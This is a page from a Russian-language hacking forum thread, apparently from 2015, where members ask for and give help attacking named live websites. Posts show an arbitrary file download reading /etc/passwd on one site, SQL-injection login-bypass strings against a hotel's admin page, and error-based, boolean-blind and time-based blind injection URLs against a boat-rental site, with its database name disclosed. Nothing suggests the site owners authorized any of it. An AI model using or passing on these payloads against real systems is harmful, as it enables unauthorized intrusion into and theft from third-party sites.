HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 24 из 296 « Первая < 14 20 21 22 23 24 25 26 27 28 3474124 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.06.2015, 17:08
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию
Как залиться ?

Погуглил про lfi+phpinfo

lekkeradverteren.nl/ioncube/loader-wizard.php?page=phpinfo

Это как я понимаю lfi http://lekkeradverteren.nl/ioncube/...me=../../../../../../../etc/passwd&download=1

Вообщем вопрос к знатокам ,как залиться ? Пробовал скриптом от Pashkela ,не получилось.
 
Ответить с цитированием

  #2  
Старый 22.06.2015, 17:48
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Xsite  
Xsite said:

Как залиться ?
Погуглил про lfi+phpinfo
lekkeradverteren.nl/ioncube/loader-wizard.php?page=phpinfo
Это как я понимаю lfi
http://lekkeradverteren.nl/ioncube/...me=../../../../../../../etc/passwd&download=1
Вообщем вопрос к знатокам ,как залиться ? Пробовал скриптом от
Pashkela
,не получилось.
это AFD: Arbitrary File Download, а не LFI
 
Ответить с цитированием

  #3  
Старый 22.06.2015, 18:37
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию
сайт http://www.bogema-hotel.ru/access_admin.php - с уязвимой админкой.

Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю.

Спустя час решил написать сюда.

Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье.
 
Ответить с цитированием

  #4  
Старый 22.06.2015, 18:49
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
По какой это статье вы делаете?
 
Ответить с цитированием

  #5  
Старый 22.06.2015, 18:59
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию
Цитата:
Сообщение от YaBtr  
YaBtr said:

По какой это статье вы делаете?
Что-то мне подсказывает что вот эту

Код:
Code:
https://rdot.org/forum/showthread.php?t=124
ну или она же тут, на ачате

Код:
Code:
/threads/43966/
и скорее всего пробует пункт 1.3 Уязвимы поле логин и пароль, обход авторазации
 
Ответить с цитированием

  #6  
Старый 22.06.2015, 19:23
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию
Именно по ней. Именно по пункту 1.3 подставляя в поле логин и пароль соотвественно.

Но даже если просто в пароль не давало результата и сообщения об ошибке ,если писал в логин

Код:
Code:
Admin' --
и

Код:
Code:
Admin' --
 
Ответить с цитированием

  #7  
Старый 22.06.2015, 19:30
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Инъекция присутствует. Пробуйте далее. Если нагрузка с обходом авторизации не проходит, попробуйте другие вектора.
 
Ответить с цитированием

  #8  
Старый 22.06.2015, 19:32
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Можно спокойно крутить error based.
 
Ответить с цитированием

  #9  
Старый 22.06.2015, 20:22
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию
Другой вектор:

Такой же сдвиг cms

Код:
Code:
http://www.kazanboats.ru/index.php?id=59"+(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
- пишет hek

Код:
Code:
http://www.kazanboats.ru/index.php?id=59%20+%281%29and%28+1+from%28+count%28*%29,concat%28%28+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--
Выбрасывает на страницу

Пробую замаркировать select при помощи concat - но не получается. Возможно, неправильно формирую запрос.

Сейчас пытаюсь просто найти кол-во таблиц - http://www.kazanboats.ru/index.php?id=59'+order+by+1000/* и http://www.kazanboats.ru/index.php?id=59'+order+by+1/*

Выдает одинаковый результат. Явно слепая иньекция.

Но если убрать кавычки или минус перед 59 - страница появляется.

Подскажи с самого простого, с поиска кол-ва таблиц.

Нужно шифровать запрос? order+by?
 
Ответить с цитированием

  #10  
Старый 22.06.2015, 20:35
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию
Цитата:
Сообщение от Muracha  
Muracha said:

Выдает одинаковый результат. Явно слепая иньекция.
2 вектора тут:

boolean-based blind

http://www.kazanboats.ru/index.php?id=59' AND 5063=5063 AND 'tviX'='tviX

time-based blind

http://www.kazanboats.ru/index.php?id=59' AND SLEEP(5) AND 'ogpP'='ogpP

база etyle2_kazboats
 
Ответить с цитированием
Ответ
Страница 24 из 296 « Первая < 14 20 21 22 23 24 25 26 27 28 3474124 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ